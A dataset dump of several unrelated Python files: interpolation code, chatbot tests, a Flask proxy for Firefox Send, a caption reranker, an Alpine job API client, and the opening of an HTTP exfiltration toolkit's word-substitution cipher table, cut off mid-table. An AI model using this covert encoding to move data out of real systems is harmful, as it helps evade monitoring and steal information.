self.Q[degree][idx] -= (x - self.x[idx + degree]) * self.Q[degree - 1][idx]
self.Q[degree][idx] /= self.x[idx + degree] - self.x[idx]
self.time_ellapsed = timer() - time0
def get_poli(self):
eq = sp.expand(self.Q[-1][-1])
print('Neville:\t' + str(eq))
for a in sp.preorder_traversal(eq):
if isinstance(a, sp.Float):
eq = eq.subs(a, round(a, 4))
return sp.lambdify(self._x, sp.expand(self.Q[-1][-1])), self.time_ellapsed, eq
def treat_data(self):
if self.x.size > 15:
step = self.x.size // int(5+self.x.size/10)
x = []
y = []
for i in range(self.x.size+step+1):
if i % step == 0:
if i >= self.x.size-1:
x.append(self.x[-1])
y.append(self.y[-1])
break
x.append(self.x[i])
y.append(self.y[i])
self.x = np.array(x)
self.y = np.array(y)
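# Usage sketch (hypothetical sample points; assumes the class as defined above):
#
#   nev = Neville()
#   nev.start([[0, 1, 2, 3], [1, 2, 0, 5]])   # data[0] = x values, data[1] = y values
#   poly, elapsed, expr = nev.get_poli()
#   print(expr)       # expanded interpolating polynomial in x
#   print(poly(1.5))  # evaluate the lambdified polynomial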
| 31.5375 | 120 | 0.442727 | 340 | 2,523 | 3.232353 | 0.226471 | 0.100091 | 0.080073 | 0.054595 | 0.247498 | 0.241128 | 0.213831 | 0.175614 | 0.153776 | 0.10737 | 0 | 0.019938 | 0.363853 | 2,523 | 79 | 121 | 31.936709 | 0.664798 | 0.122473 | 0 | 0.070175 | 0 | 0 | 0.015427 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.087719 | false | 0 | 0.052632 | 0 | 0.175439 | 0.035088 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5b808a99380bd94afac98d7d0e9d8f814414f64f | 1,103 | py | Python | tests/test_fuzzy_matching.py | zhangkaizhao/supportbot | 03c8e1761a3450614b53c3bdc8c5c33af1f186ec | [
"MIT"
] | 1 | 2019-02-27T06:07:17.000Z | 2019-02-27T06:07:17.000Z | tests/test_fuzzy_matching.py | zhangkaizhao/supportbot | 03c8e1761a3450614b53c3bdc8c5c33af1f186ec | [
"MIT"
] | null | null | null | tests/test_fuzzy_matching.py | zhangkaizhao/supportbot | 03c8e1761a3450614b53c3bdc8c5c33af1f186ec | [
"MIT"
] | null | null | null | from supportbot.bots import FuzzyMatchingSupportbot
from helpers import get_fixture_filepath
def _make_bot(filename):
filepath = get_fixture_filepath(filename)
return FuzzyMatchingSupportbot(filepath)
def test_fuzzy_matching_reply():
filename = "questions_answers.txt"
question = "OK?"
bot = _make_bot(filename)
result = bot.reply(question)
assert(question in result["question"])
assert(result.get("answer") is not None)
def test_fuzzy_matching_reply_none():
filename = "questions_answers.txt"
question = "找不到"
bot = _make_bot(filename)
result = bot.reply(question)
assert(result is None)
def test_fuzzy_matching_reply_zh():
filename = "questions_answers_zh.txt"
question = "你好"
bot = _make_bot(filename)
result = bot.reply(question)
assert(question in result["question"])
assert(result.get("answer") is not None)
def test_fuzzy_matching_reply_zh_none():
filename = "questions_answers_zh.txt"
question = "讨厌啦"
bot = _make_bot(filename)
result = bot.reply(question)
assert(result is None)
| 21.627451 | 51 | 0.715322 | 137 | 1,103 | 5.49635 | 0.248175 | 0.111554 | 0.099602 | 0.106242 | 0.749004 | 0.622842 | 0.524568 | 0.486056 | 0.486056 | 0.486056 | 0 | 0 | 0.186763 | 1,103 | 50 | 52 | 22.06 | 0.839465 | 0 | 0 | 0.580645 | 0 | 0 | 0.116954 | 0.081596 | 0 | 0 | 0 | 0 | 0.193548 | 1 | 0.16129 | false | 0 | 0.064516 | 0 | 0.258065 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5b808ed1b42ee2bf4fcd01d4c2489a179a5aa41b | 6,668 | py | Python | experiments/firefox_send/Flask_App.py | olegtaranenko/gw-proxy-serverless | afb5d7b7cfaf6bfb82bafe951e45c76a11a0ffd3 | [
"Apache-2.0"
] | null | null | null | experiments/firefox_send/Flask_App.py | olegtaranenko/gw-proxy-serverless | afb5d7b7cfaf6bfb82bafe951e45c76a11a0ffd3 | [
"Apache-2.0"
] | null | null | null | experiments/firefox_send/Flask_App.py | olegtaranenko/gw-proxy-serverless | afb5d7b7cfaf6bfb82bafe951e45c76a11a0ffd3 | [
"Apache-2.0"
] | null | null | null | import json
import sys
from websocket import create_connection
sys.path.append('.')
sys.path.append('./modules/OSBot-Utils')
from osbot_utils.utils.Files import Files
from flask import Flask,request,redirect,Response
#from flask_socketio import SocketIO, emit
import requests
from gw_proxy.api.Http_Proxy import Http_Proxy
from flask_sockets import Sockets
app = Flask(__name__)
sockets = Sockets(app)
#socketio = SocketIO(app)
# Proxy targets tried during experimentation (only the last assignment takes effect):
# SITE_NAME = 'https://glasswallsolutions.com/'
# SITE_NAME = 'https://demo.pydio.com/'
# SITE_NAME = 'https://httpbin.org'
SITE_NAME = 'https://send.firefox.com/'
@app.route('/ping')
def ping():
return 'pong'
@sockets.route('/api/ws')
def echo_socket(ws): # this all works ok
print('\n\n********* /api/ws')
ff_ws = create_connection("wss://send.firefox.com/api/ws")
file_metadata = ws.receive()
print("sending file_metadata")
ff_ws.send(file_metadata)
target_details = ff_ws.recv()
print(f'target_details: {target_details}')
ws.send(target_details)
bytes_1 = ws.receive()
bytes_2 = ws.receive()
bytes_3 = ws.receive()
#print(f"sending bytes_1 : {len(bytes_1)}")
ff_ws.send(bytes_1)
#print(f"sending bytes_2 : {len(bytes_2)}")
ff_ws.send(bytes_2)
#print(f"sending bytes_3 : {len(bytes_3)}")
ff_ws.send(bytes_3)
result = ff_ws.recv()
print(f'result: {result}')
ws.send(result)
print('<<<< all done >>>>>\n\n')
@sockets.route('/api/ws__ok')
def echo_socket_ok(ws):  # renamed: a second `echo_socket` def would shadow the one above
print('********* in Socket')
message = ws.receive()
if type(message) is str:
print(f"received: {message}")
file_metadata = json.loads(message)
#print(f"fileMetadata: {message_data.get('fileMetadata')}")
print('>>>>> sending ok <<<<<<<<<<')
print(ws.send)
ws.send('{"url":"https://send.firefox.com/download/8de4acc1dd5bee5a/","ownerToken":"88b28511eb6d5fc2d23f","id":"8de4acc1dd5bee5a"}')
# , json=True, namespace='/api/ws')
print('>>>>> all done')
#print(Files.save_string_as_file('/tmp/_firefox_send__file_metadata', json.dumps(file_metadata)))
#print(Files.save_bytes_as_file('/tmp/_firefox_send__bytes_1', ws.receive()))
#print(Files.save_bytes_as_file('/tmp/_firefox_send__bytes_2', ws.receive()))
#print(Files.save_bytes_as_file('/tmp/_firefox_send__bytes_3', ws.receive()))
# while True:
# bytes = ws.receive()
# print(f'received {len(bytes)}')
# print(bytes)
# if len(bytes) == 1:
# break
#print(bytes)
#bytes_2 = ws.receive()
#bytes_3 = ws.receive()
##print(f'received {len(bytes_1)} - {len(bytes_2)} - {len(bytes_3)}')
# #print(type(ws.receive()),ws.closed)
# print('>>>>> 1')
# print(type(ws.receive()), ws.closed)
# print('>>>>> 2')
# print(type(ws.receive()), ws.closed)
# print('>>>>> 3')
ws.send('{"ok": true}', ws.closed)
print('>>>>> 4')
else:
print(f"received non string: {type(message)}")
#
#while not ws.closed:
# message = ws.receive()
# if not message:
# message = ''
# print(f'**** received file with size : {len(message)} ')
# ws.send({'ok-2': True}, json=True)
# ws.send({'ok': True}, json=True, namespace='/api/ws')
@app.route('/')
@app.route('/<path:path>',methods=['GET','POST',"PUT","DELETE"])
def proxy(path=''):
global SITE_NAME
excluded_headers = ['content-encoding', 'content-length', 'transfer-encoding', 'connection','host']
try:
#print(request.headers)
target= f'{SITE_NAME}{path}'
if request.method=='GET':
response = Http_Proxy(target=target,method='GET',headers=request.headers).make_request()
return Response(response.get('body'), response.get('statusCode'),response.get('headers'))
elif request.method=='POST':
response = Http_Proxy(target=target, method='POST', headers=request.headers,body=request.data).make_request()
#print(response)
return Response(response.get('body'), response.get('statusCode'), response.get('headers'))
# headers = {}
# for (key,value) in request.headers:
# if key.lower() != 'host':
# headers[key] = value
# #print(headers)
# #print('content type: ', request.headers.get('Content-Type'))
# if request.headers.get('Content-Type')== 'application/json':
# print('POST : ', request.get_json())
# resp = requests.post(f'{SITE_NAME}{path}',json=request.get_json(), headers=headers)
# else:
# resp = requests.post(f'{SITE_NAME}{path}', data=request.get_data(), headers=headers)
# headers = [(name, value) for (name, value) in resp.raw.headers.items() if name.lower() not in excluded_headers]
# response = Response(resp.content, resp.status_code, headers)
# return response
elif request.method=='PUT':
headers = {}
for (key,value) in request.headers:
if key.lower() != 'host':
headers[key] = value
#print(headers)
#print('content type: ', request.headers.get('Content-Type'))
if request.headers.get('Content-Type')== 'application/json':
#print('PUT : ', request.get_json())
resp = requests.put(f'{SITE_NAME}{path}',json=request.get_json(), headers=headers)
else:
resp = requests.post(f'{SITE_NAME}{path}', data=request.get_data(), headers=headers)
headers = [(name, value) for (name, value) in resp.raw.headers.items() if name.lower() not in excluded_headers]
response = Response(resp.content, resp.status_code, headers)
return response
elif request.method=='DELETE':
            resp = requests.delete(f'{SITE_NAME}{path}')  # keep the Response object; `.content` broke the .raw/.status_code uses below
headers = [(name, value) for (name, value) in resp.raw.headers.items() if name.lower() not in excluded_headers]
response = Response(resp.content, resp.status_code, headers)
return response
except Exception as error:
return f'{error}'
if __name__ == '__main__':
#app.run(debug = False,port=443, ssl_context='adhoc')
from gevent import pywsgi
from geventwebsocket.handler import WebSocketHandler
print('starting server')
server = pywsgi.WSGIServer(('', 12345), app, handler_class=WebSocketHandler)
server.serve_forever() | 38.543353 | 140 | 0.59913 | 810 | 6,668 | 4.782716 | 0.188889 | 0.034848 | 0.021683 | 0.020134 | 0.447599 | 0.413526 | 0.395457 | 0.355188 | 0.355188 | 0.355188 | 0 | 0.010965 | 0.234103 | 6,668 | 173 | 141 | 38.543353 | 0.747601 | 0.326035 | 0 | 0.131868 | 0 | 0.010989 | 0.182679 | 0.011277 | 0 | 0 | 0 | 0 | 0 | 1 | 0.043956 | false | 0 | 0.10989 | 0.010989 | 0.21978 | 0.142857 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5b83a834e3f1d50dc2140e7d4b70fe0b778dca6a | 4,513 | py | Python | image-comment-matching/rerank.py | stonyhu/Image-Commenting | eb925a3f99075d8b74c6cabd125f7b9a1f9786d2 | [
"Apache-2.0"
] | null | null | null | image-comment-matching/rerank.py | stonyhu/Image-Commenting | eb925a3f99075d8b74c6cabd125f7b9a1f9786d2 | [
"Apache-2.0"
] | null | null | null | image-comment-matching/rerank.py | stonyhu/Image-Commenting | eb925a3f99075d8b74c6cabd125f7b9a1f9786d2 | [
"Apache-2.0"
] | null | null | null | import time
import MeCab
from tqdm import tqdm
import argparse
import torch
import torch.nn.functional as F
from model import Model
from utils.functional import load_image_caption, str2bool
mecab = MeCab.Tagger('-Ochasen')
parser = argparse.ArgumentParser('Rerank all generated captions')
parser.add_argument('-d', '--image-dir')
parser.add_argument('-i', '--caption-file')
parser.add_argument('--cuda', type=str2bool, nargs='?',
const=True, default=torch.cuda.is_available(),
help='whether to use GPU acceleration.')
parser.add_argument('--model-file', type=str, default='output/best.pt')
parser.add_argument('-o', '--output-file', type=str, default='generation.rerank.txt')
parser.add_argument('-bs', '--batch-size', type=int, default=16)
parser.add_argument('--max-len', type=int, default=18)
args = parser.parse_args()
samples = load_image_caption(args.image_dir, args.caption_file, args.batch_size)
print(f'{time.asctime()}-Images and Captions loaded.')
matching_model, _ = Model.load(args, args.model_file)
print(f'{time.asctime()}-Matching Model loaded.')
def predict(samples):
result = {}
matching_model.model.eval()
for images, captions, image_paths in tqdm(samples, desc='Predicting'):
caption_vecs = matching_model.vectorize_text(captions, sample=False)
outputs = matching_model.model(images, caption_vecs)
outputs = F.softmax(outputs, dim=1).transpose(1, 0)[1]
outputs = outputs.data.cpu().numpy()
for image_path, caption, score in zip(image_paths, captions[0], outputs):
image_path = image_path.split('/')[-1]
if image_path not in result:
score_dict = dict()
score_dict[caption] = score
result[image_path] = score_dict
else:
result[image_path][caption] = score
sorted_result = {}
for image_path, score_dict in result.items():
ordered = sorted(score_dict.items(), key=lambda tup: tup[1], reverse=True)
sorted_result[image_path] = [(caption, '%.8f' % score) for caption, score in ordered]
return result, sorted_result
def rerank(pred_result):
gen_result = {}
for l in open(args.caption_file):
items = l.strip().split('\t')
image_path = items[0]
prob_dict = dict()
for i in range(1, len(items), 2):
caption = items[i]
prob = float(items[i + 1])
prob_dict[caption] = prob
gen_result[image_path] = prob_dict
for image_path, score_dict in pred_result.items():
for caption in score_dict.keys():
score_dict[caption] *= gen_result[image_path][caption]
sorted_result = dict()
for image_path, score_dict in pred_result.items():
ordered = sorted(score_dict.items(), key=lambda tup: tup[1], reverse=True)
sorted_result[image_path] = [(caption, '%.8f' % score) for caption, score in ordered]
return sorted_result
def filter_ner(result):
new_result = {}
for key in result.keys():
pairs = result[key]
new_pairs = []
for caption, score in pairs:
text = caption.replace(' ', '')
node = mecab.parseToNode(text)
flag = False
while node:
token = node.surface
features = node.feature.split(',')
tag = features[0]
tag_type = features[1]
                if tag == '名詞' and tag_type == '固有名詞' and len(token) >= 2:  # MeCab: noun (名詞) / proper noun (固有名詞)
flag = True
break
node = node.next
if not flag:
new_pairs.append((caption, score))
new_result[key] = new_pairs
return new_result
def save2txt(result, filename):
with open(filename, 'w') as f:
for l in open(args.caption_file):
image_path = l.strip().split('\t')[0]
captions = result[image_path]
out_str = '\t'.join([y for x in captions for y in x])
f.write(f'{image_path}\t{out_str}\n')
if __name__ == '__main__':
pred_result, sorted_result = predict(samples)
# result1 = filter_ner(sorted_result)
save2txt(sorted_result, 'generation.matching.txt')
rerank_result = rerank(pred_result)
# result2 = filter_ner(rerank_result)
save2txt(rerank_result, 'generation.rerank.txt')
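# Note on the reranking above: rerank() combines the two signals multiplicatively,
#   final_score(caption) = P_match(image, caption) * P_gen(caption | image),
# so a caption must score well under both the matching model and the generator.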
| 37.297521 | 94 | 0.605141 | 562 | 4,513 | 4.681495 | 0.272242 | 0.058153 | 0.04523 | 0.027366 | 0.154314 | 0.154314 | 0.145572 | 0.126568 | 0.126568 | 0.126568 | 0 | 0.008833 | 0.272546 | 4,513 | 120 | 95 | 37.608333 | 0.792568 | 0.015732 | 0 | 0.081633 | 0 | 0 | 0.089182 | 0.031967 | 0 | 0 | 0 | 0 | 0 | 1 | 0.040816 | false | 0 | 0.081633 | 0 | 0.153061 | 0.020408 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5b83c5eaa2c2d8a8bb4f83de0e100de77825c6af | 16,924 | py | Python | alpine/job.py | alpinedatalabs/python-alpine-api | 2f74e4eeb7cb6d2b4f2d73db90e8c4afc552d1e7 | [
"MIT"
] | null | null | null | alpine/job.py | alpinedatalabs/python-alpine-api | 2f74e4eeb7cb6d2b4f2d73db90e8c4afc552d1e7 | [
"MIT"
] | 8 | 2017-03-07T01:23:22.000Z | 2019-10-24T22:45:46.000Z | alpine/job.py | alpinedatalabs/python-alpine-api | 2f74e4eeb7cb6d2b4f2d73db90e8c4afc552d1e7 | [
"MIT"
] | 3 | 2017-03-13T11:15:19.000Z | 2019-03-24T21:47:05.000Z | import json
import pytz
from datetime import datetime, timedelta
try:
# For Python 3.0 and later
from urllib.parse import urlparse
from urllib.parse import urljoin
except ImportError:
# Fall back to Python 2.7
from urlparse import urlparse
from urlparse import urljoin
from .exception import *
from .alpineobject import AlpineObject
class Job(AlpineObject):
"""
    A class for interacting with jobs. The top-level methods operate on whole jobs;
    the subclass `Task` can be used to interact with individual tasks within a job.
"""
task = None
@property
def scheduleType(self):
return self.ScheduleType()
def __init__(self, base_url, session, token):
super(Job, self).__init__(base_url, session, token)
self.task = Job.Task(base_url, session, token)
def create(self, workspace_id, job_name, schedule_type=None, interval_value=0, next_run=None,
time_zone=None):
"""
Create a new job in a workspace with specified configuration.
:param int workspace_id: ID of the workspace where the job is to be created.
:param str job_name: Name of the job to be created.
:param str schedule_type: Job run interval time unit. Use the `Job.ScheduleType` object for convenience.
The default value is "on_demand".
:param int interval_value: Job run interval value. If you choose 'Job.ScheduleType.Weekly' for
`schedule_type` and '2' for `interval_value`, then it will run every 2 weeks.
:param datetime next_run: When the next run should happen.
:param timezone time_zone: Time zone info. If no time zone is provided, we use UTC.
:return: Created job metadata.
:rtype: dict
Example::
>>> session.job.create(workspace_id = 1672, job_name = "APICreatedJob",
>>> schedule_type = Job.ScheduleType.Weekly, interval_value = 2,
>>> next_run = datetime.today().now(pytz.timezone('US/Pacific')) + timedelta(hours=1),
>>> time_zone =pytz.timezone('US/Pacific')
>>> )
"""
if time_zone is None:
time_zone = pytz.utc
if schedule_type is None:
schedule_type = Job.ScheduleType.OnDemand
if next_run is None and schedule_type != Job.ScheduleType.OnDemand:
next_run = datetime.now(time_zone)
url = "{0}/workspaces/{1}/jobs".format(self.base_url, workspace_id)
url = self._add_token_to_url(url)
self.session.headers.update({"Content-Type": "application/x-www-form-urlencoded"})
# Building the payload information to send with our HTTP POST to create the job
payload = {"name": job_name,
"interval_unit": schedule_type,
"interval_value": interval_value,
"next_run": next_run,
"sucess_notify": "nobody",
"description": "",
"endrun": False,
"time_zone": time_zone
}
# Posting the payload via HTTP POST
self.logger.debug("POSTing payload {0} to URL {1}".format(payload, url))
response = self.session.post(url, data=payload, verify=False)
self.logger.debug("Received response code {0} with reason {1}...".format(response.status_code, response.reason))
try:
return response.json()['response']
except KeyError:
return response.json()
def delete(self, workspace_id, job_id):
"""
Delete a job from a workspace.
:param int workspace_id: ID of the workspace that contains the job.
:param str job_id: ID of the job to delete.
:return: None.
:rtype: NoneType
:exception JobNotFoundException: The job does not exist.
:exception InvalidResponseCodeException: The request got an unexpected HTTP status code in response (not 200 OK).
Example::
>>> session.job.delete(workspace_id = 1672, job_id = 675)
"""
try:
url = "{0}/workspaces/{1}/jobs/{2}".format(self.base_url, workspace_id, job_id)
url = self._add_token_to_url(url)
            # Issue the HTTP DELETE
self.logger.debug("Deleting the job ID: <{0}> from workspace ID: <{1}>".format(job_id, workspace_id))
response = self.session.delete(url, verify=False)
self.logger.debug("Received response code {0} with reason {1}".
format(response.status_code, response.reason)
)
if response.status_code == 200:
self.logger.debug("Job successfully deleted.")
else:
raise InvalidResponseCodeException("Response code invalid, the expected response code is {0}, "
"the actual response code is {1}".format(200, response.status_code))
return None
except JobNotFoundException as err:
self.logger.debug("Job not found, error {0}".format(err))
def get_list(self, workspace_id, per_page=50):
"""
Get a list of all jobs in a workspace.
:param int workspace_id: ID of the workspace.
:param int per_page: Maximum number to fetch with each API call.
:return: List of jobs' metadata.
:rtype: list of dict
Example::
>>> all_jobs = session.job.get_list(workspace_id = 1672)
"""
jobs_list = None
url = "{0}/workspaces/{1}/jobs".format(self.base_url, workspace_id)
url = self._add_token_to_url(url)
page_current = 0
if self.session.headers.get("Content-Type") is not None:
self.session.headers.pop("Content-Type")
while True:
payload = {
"per_page": per_page,
"page": page_current + 1,
}
job_list_response = self.session.get(url, data=json.dumps(payload), verify=False).json()
page_total = job_list_response['pagination']['total']
page_current = job_list_response['pagination']['page']
if jobs_list:
jobs_list.extend(job_list_response['response'])
else:
jobs_list = job_list_response['response']
if page_total == page_current:
break
return jobs_list
def get(self, workspace_id, job_id):
"""
Get one job's metadata.
:param int workspace_id: ID of the workspace that contains the job.
:param str job_id: ID of the job.
:return: Selected job's metadata.
:rtype: dict
Example::
>>> job_info = session.job.get(workspace_id = 1672, job_id = 675)
"""
url = "{0}/workspaces/{1}/jobs/{2}".format(self.base_url, workspace_id, job_id)
url = self._add_token_to_url(url)
if self.session.headers.get("Content-Type") is not None:
self.session.headers.pop("Content-Type")
r = self.session.get(url, verify=False)
job_response = r.json()
try:
if job_response['response']:
self.logger.debug("Found job ID: <{0}>".format(job_id))
return job_response['response']
else:
raise JobNotFoundException("Job ID: <{0}> not found".format(job_id))
except Exception as err:
raise JobNotFoundException("Job ID: <{0}> not found".format(job_id))
def get_id(self, workspace_id, job_name):
"""
Gets the job ID.
:param int workspace_id: ID of the workspace the job is in.
:param str job_name: Name of the job.
:return: ID of the job.
:rtype: int
Example::
>>> job_id = session.job.get_id(workspace_id = 1672, job_name = "DemoJob")
>>> print(job_id)
675
"""
job_list = self.get_list(workspace_id)
for job_info in job_list:
if job_info['name'] == job_name:
return job_info['id']
raise JobNotFoundException("Job {0} not found".format(job_name))
def run(self, job_id):
"""
Run a job.
:param int job_id: ID of the job.
        :return: Metadata of the started job run.
        :rtype: dict
Example::
>>> session.job.run(job_id = 675)
"""
url = "{0}/jobs/{1}/run?saveResult=true".format(self.base_url, job_id)
self.session.headers.update({"x-token": self.token})
self.session.headers.update({"Content-Type": "application/json"})
response = self.session.post(url, timeout=30)
self.session.headers.pop("Content-Type")
self.logger.debug(response.content)
if response.status_code == 202:
job = response.json()['response']
self.logger.debug("Job with ID: <{0}> run started".format(job['id']))
return job
else:
raise RunJobFailureException("Running job with ID: <{0}> failed with status code {1}".
format(job_id, response.status_code))
class Task(AlpineObject):
"""
A class for interacting with job tasks.
"""
def __init__(self, base_url, session, token):
super(Job.Task, self).__init__(base_url, session, token)
self.chorus_domain = '{uri.scheme}://{uri.netloc}/'.format(uri=urlparse(self.base_url))
self.logger.debug(self.chorus_domain)
self.alpine_base_url = urljoin(self.chorus_domain,
"alpinedatalabs/api/{0}/json".format(self._alpine_api_version))
self.logger.debug("alpine_base_url is: {0}".format(self.alpine_base_url))
def create(self, workspace_id, job_id, workfile_id, task_type=None):
"""
Add a new task to an existing job using an existing workfile.
:param int workspace_id: ID of the workspace.
:param int job_id: ID of the job to which the task is to be added.
:param int workfile_id: ID of the workfile to be added as a task.
:param str task_type: Task type. Use the `Workspace.Stage` object for convenience.
The default is "run_work_flow".
:return: Metadata of the new task.
:rtype: dict
Example::
>>> session.job.task.create(workspace_id = 1672, job_id = 675, workfile_id = 823)
"""
if task_type is None:
task_type = "run_work_flow"
self.logger.debug("The job ID: <{0}>".format(job_id))
url = "{0}/workspaces/{1}/jobs/{2}/job_tasks".format(self.base_url, workspace_id, job_id)
url = self._add_token_to_url(url)
self.logger.debug("The URL that we will be posting is: {0}".format(url))
self.session.headers.update({"Content-Type": "application/x-www-form-urlencoded"})
# constructing the payload for adding a task
payload = {"action": task_type, "workfile_id": workfile_id}
self.logger.debug("POSTing payload {0} to URL {1}".format(payload, url))
response = self.session.post(url, data=payload, verify=False)
self.logger.debug(
"Received response code {0} with reason {1}...".format(response.status_code, response.reason))
try:
return response.json()['response']
except KeyError:
return response.json()
def delete(self, workspace_id, job_id, task_id):
"""
Delete a task from a job.
:param int workspace_id: ID of the workspace.
:param int job_id: ID of the job that has the task to be deleted.
:param int task_id: ID of the task.
:return: None
:rtype: NoneType
:exception TaskNotFoundException: The job does not exist.
:exception InvalidResponseCodeException: The request got an unexpected HTTP status code in response (not 200 OK).
Example::
>>> session.job.task.delete(workspace_id = 1672, job_id = 675, task_id = 344)
"""
try:
self.logger.debug("Constructing the URL for task deletion")
url = "{0}/workspaces/{1}/jobs/{2}/job_tasks/{3}".format(self.base_url, workspace_id, job_id, task_id)
url = self._add_token_to_url(url)
self.logger.debug("We have constructed the URL for task deletion. It is: {0}".format(url))
response = self.session.delete(url)
self.logger.debug(
"Received response code {0} with reason {1}...".format(response.status_code, response.reason))
if response.status_code == 200:
self.logger.debug("Task successfully deleted.")
else:
raise InvalidResponseCodeException("Response code invalid. the expected response code is {0}, "
"the actual response code is {1}".format(200,
response.status_code))
return None
except TaskNotFoundException as err:
self.logger.debug("Task not found, error {0}".format(err))
def get_list(self, workspace_id, job_id):
"""
Get a list of all tasks in a job.
:param int workspace_id: ID of the workspace.
:param int job_id: ID of the job.
:return: List of all tasks in the job.
:rtype: list of dict
Example::
>>> session.job.task.get_list(workspace_id = 1672, job_id = 675);
"""
self.logger.debug("Getting the job ID: {0}".format(job_id))
# Constructing the URL to retrieve the contents
url = "{0}/workspaces/{1}/jobs/{2}".format(self.base_url, workspace_id, job_id)
url = self._add_token_to_url(url)
if self.session.headers.get("Content-Type") is not None:
self.session.headers.pop("Content-Type")
            # Issue the HTTP GET
            self.logger.debug("Sending an HTTP GET to retrieve the tasks of the job.")
response = self.session.get(url)
self.logger.debug(
"Received response code {0} with reason {1}...".format(response.status_code, response.reason))
task_list = response.json()['response']['tasks']
return task_list
def get(self, workspace_id, job_id, task_id):
"""
Return metadata of one task.
:param int workspace_id: ID of the workspace.
:param int job_id: ID of the job.
:param int task_id: ID of the task.
:return: Selected task's metadata.
:rtype: dict
Example::
>>> session.job.task.get(workspace_id = 1672, job_id = 675, task_id = 344)
"""
task_list = self.get_list(workspace_id, job_id)
for task in task_list:
if task['id'] == task_id:
self.logger.debug(
"Found the task ID: <{0}>".format(task_id))
return task
raise TaskNotFoundException("The task ID: <{0}> does not exist".format(task_id))
def get_id(self, workspace_id, job_id, task_name):
"""
Return the ID of a task.
:param int workspace_id: ID of the workspace.
:param int job_id: ID of the job.
:param str task_name: Name of the task.
:return: ID of the task.
:rtype: int
Example::
>>> session.job.task.get_id(workspace_id = 1672, job_id = 675, task_name = "Run test2")
344
"""
task_list = self.get_list(workspace_id, job_id)
for task in task_list:
if task['name'] == task_name:
return int(task['id'])
# return None
raise TaskNotFoundException("The task with name: {0} does not exist".format(task_name))
class ScheduleType(object):
"""
Convenience strings for schedule types.
"""
OnDemand = "on_demand"
Monthly = "months"
Weekly = "weeks"
Daily = "days"
Hourly = "hours"
class TaskType(object):
"""
Convenience strings for task types.
"""
RunWorkflow = "run_work_flow"
RunSQLFile = "run_sql_workfile"
RunNotebook = "notebook"
| 39.63466 | 125 | 0.568424 | 2,059 | 16,924 | 4.530355 | 0.127732 | 0.026265 | 0.038593 | 0.020262 | 0.552101 | 0.478666 | 0.428066 | 0.400086 | 0.36503 | 0.34048 | 0 | 0.015509 | 0.329473 | 16,924 | 426 | 126 | 39.7277 | 0.806486 | 0.289175 | 0 | 0.306533 | 0 | 0 | 0.17959 | 0.033244 | 0 | 0 | 0 | 0 | 0 | 1 | 0.070352 | false | 0 | 0.050251 | 0.005025 | 0.21608 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5b88af3896dc7ac76c3bd00bb55fe5410335259b | 11,276 | py | Python | methods/http/param_cipher.py | bbhunter/lollipopz | ed6945eab4f017b1b6b8d3d4ec7a3efc1108cd20 | [
"MIT"
] | null | null | null | methods/http/param_cipher.py | bbhunter/lollipopz | ed6945eab4f017b1b6b8d3d4ec7a3efc1108cd20 | [
"MIT"
] | null | null | null | methods/http/param_cipher.py | bbhunter/lollipopz | ed6945eab4f017b1b6b8d3d4ec7a3efc1108cd20 | [
"MIT"
] | null | null | null | import random
import urllib
from scapy.layers import http
import exfilkit as lpz
from exfilkit import methods
ENCODING_TABLE = {
'0': 'radio',
'1': 'spoke',
'2': 'thick',
'3': 'human',
'4': 'atom',
'5': 'effect',
'6': 'electric',
'7': 'expect',
'8': 'bone',
'9': 'rail',
'a': 'imagine',
'b': 'provide',
'c': 'agree',
'd': 'thus',
'e': 'gentle',
'f': 'woman',
'g': 'captain',
'h': 'guess',
'i': 'necessary',
'j': 'sharp',
'k': 'wing',
'l': 'create',
'm': 'neighbor',
'n': 'wash',
'o': 'condition',
'p': 'feed',
'q': 'tool',
'r': 'total',
's': 'basic',
't': 'smell',
'u': 'valley',
'v': 'nor',
'w': 'double',
'x': 'seat',
'y': 'continue',
'z': 'block',
'A': 'chart',
'B': 'hat',
'C': 'sell',
'D': 'success',
'E': 'company',
'F': 'subtract',
'G': 'event',
'H': 'particular',
'I': 'deal',
'J': 'swim',
'K': 'term',
'L': 'opposite',
'M': 'wife',
'N': 'shoe',
'O': 'shoulder',
'P': 'spread',
'Q': 'arrange',
'R': 'camp',
'S': 'invent',
'T': 'cotton',
'U': 'born',
'V': 'determine',
'W': 'quart',
'X': 'nine',
'Y': 'truck',
'Z': 'noise',
'!': 'level',
'"': 'chance',
'#': 'gather',
'$': 'shop',
'%': 'stretch',
'&': 'throw',
"'": 'shine',
'(': 'property',
')': 'column',
'*': 'molecule',
'+': 'select',
',': 'wrong',
'-': 'gray',
'.': 'repeat',
'/': 'require',
':': 'broad',
';': 'prepare',
'<': 'salt',
'=': 'nose',
'>': 'plural',
'?': 'anger',
'@': 'claim',
'[': 'bat',
'\\': 'rather',
']': 'crowd',
'^': 'corn',
'_': 'compare',
'`': 'poem',
'{': 'history',
'|': 'bell',
'}': 'depend',
